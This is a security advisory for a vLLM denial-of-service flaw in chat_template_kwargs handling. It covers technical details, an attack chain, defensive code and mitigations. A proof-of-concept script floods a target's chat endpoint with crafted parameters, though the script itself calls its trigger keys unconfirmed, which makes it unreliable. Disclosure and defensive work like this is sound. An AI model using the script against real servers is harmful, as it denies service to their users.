CVE-2025-62426: vLLM chat_template_kwargs Parameter Denial-of-Service Vulnerability

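Vulnerability Information

CVE ID: CVE-2025-62426
Vulnerability type: Denial of service
CVSS score: 6.5 (Medium)
Attack vector: Network (AV:N)
Privileges required: Low (PR:L)
User interaction: None (UI:N)
Affected product: vLLM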

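Overview

vLLM is an open-source engine for large language model (LLM) inference and serving. This vulnerability affects every vLLM release from 0.5.5 up to, but not including, 0.11.1. It stems from improper handling of the chat_template_kwargs request parameter in the /v1/chat/completions and /tokenize API endpoints: the parameter is used directly by the code before it has been validated against the chat template. By sending a request with specific chat_template_kwargs values, an attacker can push the server into a long-running processing state that ties up server resources and delays or blocks every other user's requests. The attack requires only low privileges and no user interaction, and successful exploitation can cause a complete loss of service availability.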

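Technical Details

The root cause is a flaw in how chat_utils.py (around lines 1602-1610) and serving_engine.py (around lines 809-814) in vLLM handle the chat_template_kwargs parameter. When a user calls the /v1/chat/completions or /tokenize endpoint, the server accepts chat_template_kwargs and passes it to the chat template processing logic without sufficient validation. An attacker can craft parameter values (for example, values containing heavily nested data or values that trigger complex template rendering logic) that drive template processing into a compute-intensive operation or an infinite loop. Because of Python's GIL (Global Interpreter Lock), this CPU-bound work blocks the server process, so all concurrent requests stall. A small number of such requests is enough to deny service to the entire API. The fixed release, 0.11.1, addresses the issue by validating the parameter before it is passed to the template.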
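The "validate before use" idea behind the fix can be illustrated with a minimal allowlist check. This is only a sketch under stated assumptions, not the actual vLLM patch: the function name, the exception class, and the allowlist contents are all hypothetical, and a real deployment would derive the permitted keys from the variables its own chat template reads.

```python
from typing import Any, Mapping, Optional

# Hypothetical allowlist: the only variables this deployment's chat template
# is assumed to read. The key name below is an example, not a vLLM constant.
ALLOWED_TEMPLATE_KWARGS = frozenset({"enable_thinking"})


class InvalidTemplateKwargs(ValueError):
    """Raised when chat_template_kwargs contains something unexpected."""


def validate_chat_template_kwargs(
    kwargs: Optional[Mapping[str, Any]],
    allowed: frozenset = ALLOWED_TEMPLATE_KWARGS,
) -> dict:
    """Reject unknown keys *before* anything is handed to template rendering."""
    if kwargs is None:
        return {}
    if not isinstance(kwargs, Mapping):
        raise InvalidTemplateKwargs("chat_template_kwargs must be a JSON object")
    unknown = sorted(str(key) for key in kwargs if key not in allowed)
    if unknown:
        raise InvalidTemplateKwargs(f"unsupported chat_template_kwargs: {unknown}")
    return dict(kwargs)
```

The point of the sketch is ordering: the check runs first and fails fast, so a rejected request never reaches the expensive rendering path.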

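Attack Chain Analysis

Step 1

The attacker fingerprints the target vLLM server and confirms that its version is at least 0.5.5 and below 0.11.1.

Step 2

The attacker builds an HTTP request that carries a malicious chat_template_kwargs parameter.

Step 3

The attacker sends the malicious request to the /v1/chat/completions or /tokenize endpoint.

Step 4

The server processes chat_template_kwargs before validating it, which triggers a compute-intensive operation.

Step 5

The server process is blocked and cannot handle other, legitimate requests.

Step 6

By sending only a small number of malicious requests, the attacker denies service to the entire API.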
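Steps 4 and 5 depend on one slow, synchronous operation stalling every other request in the same process. The following self-contained sketch reproduces that effect in isolation. It assumes a single asyncio event loop serving all requests and does not use any vLLM code; slow_render and quick_request_latency are hypothetical names introduced for illustration.

```python
import asyncio
import time


def slow_render(seconds: float) -> None:
    """Hypothetical stand-in for a synchronous, CPU-bound template render."""
    deadline = time.perf_counter() + seconds
    while time.perf_counter() < deadline:
        pass  # busy-wait: never yields control back to the event loop


async def quick_request_latency(block_seconds: float) -> float:
    """Return how long a trivial request takes while another handler blocks."""

    async def quick_handler() -> float:
        start = time.perf_counter()
        await asyncio.sleep(0.01)  # needs the event loop to wake it up again
        return time.perf_counter() - start

    quick = asyncio.create_task(quick_handler())
    await asyncio.sleep(0)        # let quick_handler start its timer
    slow_render(block_seconds)    # a second "handler" blocks the loop thread
    return await quick


if __name__ == "__main__":
    print(f"idle loop:    {asyncio.run(quick_request_latency(0.0)):.3f}s")
    print(f"blocked loop: {asyncio.run(quick_request_latency(0.3)):.3f}s")
```

The quick request cannot finish until the blocking call returns, so its latency is at least as long as the blocking work, regardless of how little work the quick request itself needs.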

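PoC / Exploit Code

⚠️ For security research only

The following code is intended solely for security research and authorized testing. Unauthorized use is illegal.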

#!/usr/bin/env python3
"""
CVE-2025-62426 PoC - vLLM chat_template_kwargs DoS
This PoC demonstrates the denial of service vulnerability in vLLM's 
chat_template_kwargs parameter handling.
"""

import requests
import json
import time
import concurrent.futures

TARGET_URL = "http://target-server:8000/v1/chat/completions"

def trigger_dos():
    """
    Send a malicious request with crafted chat_template_kwargs
    to trigger long processing time.
    """
    headers = {
        "Content-Type": "application/json",
        "Authorization": "Bearer YOUR_API_KEY"
    }
    
    # Craft malicious payload with problematic chat_template_kwargs
    payload = {
        "model": "meta-llama/Llama-3-8b",
        "messages": [
            {"role": "user", "content": "Hello"}
        ],
        # Example chat_template_kwargs; these key names are illustrative, not confirmed triggers
        "chat_template_kwargs": {
            "loop_trigger": True,
            "nested_data": {"level1": {"level2": {"level3": {"level4": {"level5": "x" * 1000}}}}
        }
    }
    
    try:
        response = requests.post(
            TARGET_URL,
            headers=headers,
            json=payload,
            timeout=5
        )
        print(f"Response status: {response.status_code}")
    except requests.exceptions.Timeout:
        print("Request timed out - server may be stalled")
    except Exception as e:
        print(f"Error: {e}")

def verify_dos():
    """
    Verify that the server is unresponsive after DoS attack.
    """
    normal_payload = {
        "model": "meta-llama/Llama-3-8b",
        "messages": [{"role": "user", "content": "Hi"}]
    }
    
    try:
        response = requests.post(
            TARGET_URL,
            json=normal_payload,
            timeout=10
        )
        return response.status_code == 200
    except requests.exceptions.RequestException:
        return False

if __name__ == "__main__":
    print("[*] Starting CVE-2025-62426 DoS attack...")
    
    # Send multiple malicious requests
    with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
        futures = [executor.submit(trigger_dos) for _ in range(3)]
        concurrent.futures.wait(futures)
    
    print("[*] Verifying server availability...")
    time.sleep(2)
    
    if not verify_dos():
        print("[+] DoS confirmed - Server is unresponsive")
    else:
        print("[-] Server still responsive")

Affected Versions

vLLM >= 0.5.5 and < 0.11.1
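For operators who want to check their own deployments against this range, a small standard-library helper might look like the sketch below. The function names are hypothetical, and the parser deliberately ignores any suffix after the numeric part (such as rc or post tags), so a pre-release of 0.11.1 would be reported as unaffected and should be checked by hand.

```python
import re
from importlib import metadata

FIRST_AFFECTED = (0, 5, 5)   # first affected release, per the advisory
FIRST_FIXED = (0, 11, 1)     # first fixed release, per the advisory


def parse_release(version: str) -> tuple:
    """Extract (major, minor, patch) from a version string; suffixes are ignored."""
    match = re.match(r"v?(\d+)\.(\d+)(?:\.(\d+))?", version.strip())
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    return (int(match[1]), int(match[2]), int(match[3] or 0))


def is_affected(version: str) -> bool:
    """True if the version falls in the range >= 0.5.5 and < 0.11.1."""
    return FIRST_AFFECTED <= parse_release(version) < FIRST_FIXED


if __name__ == "__main__":
    try:
        installed = metadata.version("vllm")
    except metadata.PackageNotFoundError:
        print("vllm is not installed in this environment")
    else:
        status = "AFFECTED" if is_affected(installed) else "not affected"
        print(f"vllm {installed}: {status}")
```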

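Defense Guide

Temporary Mitigations

If you cannot upgrade to 0.11.1 or later right away, the following temporary mitigations can reduce exposure:

1) Configure request timeouts and rate limiting in the reverse proxy (for example, Nginx).
2) Limit the size and complexity of the chat_template_kwargs parameter.
3) Monitor API endpoint response times and set alert thresholds.
4) Consider temporarily disabling or restricting use of the chat_template_kwargs parameter.
5) Use WAF (web application firewall) rules to filter abnormal chat_template_kwargs requests.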
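Limiting or disabling chat_template_kwargs can be done in a gateway placed in front of vLLM, before the request body is forwarded. The sketch below is one possible shape for such a filter, not a vetted rule set: the function names and both limits are assumptions chosen for illustration. Because the advisory does not state exactly which values trigger the stall, size and depth limits may not stop every malicious request, and stripping the field entirely (strip=True) is the more conservative choice.

```python
import json
from typing import Any

MAX_KWARGS_BYTES = 1024  # assumed limit on the serialized size of the field
MAX_KWARGS_DEPTH = 2     # assumed limit on container nesting


def nesting_depth(value: Any) -> int:
    """Depth of nested dicts/lists, computed iteratively (scalars have depth 0)."""
    deepest = 0
    stack = [(value, 0)]
    while stack:
        node, depth = stack.pop()
        if isinstance(node, dict):
            children = list(node.values())
        elif isinstance(node, list):
            children = node
        else:
            continue
        deepest = max(deepest, depth + 1)
        stack.extend((child, depth + 1) for child in children)
    return deepest


def filter_request_body(body: dict, *, strip: bool = False) -> dict:
    """Return a copy of the body that may be forwarded, or raise ValueError."""
    kwargs = body.get("chat_template_kwargs")
    if kwargs is None:
        return dict(body)
    if strip:
        # Disable the feature entirely by dropping the field.
        return {k: v for k, v in body.items() if k != "chat_template_kwargs"}
    if not isinstance(kwargs, dict):
        raise ValueError("chat_template_kwargs must be a JSON object")
    if len(json.dumps(kwargs).encode("utf-8")) > MAX_KWARGS_BYTES:
        raise ValueError("chat_template_kwargs is too large")
    if nesting_depth(kwargs) > MAX_KWARGS_DEPTH:
        raise ValueError("chat_template_kwargs is nested too deeply")
    return dict(body)
```

A gateway would call filter_request_body on the parsed JSON body and answer with an HTTP 400 when it raises, so rejected requests never reach the inference server.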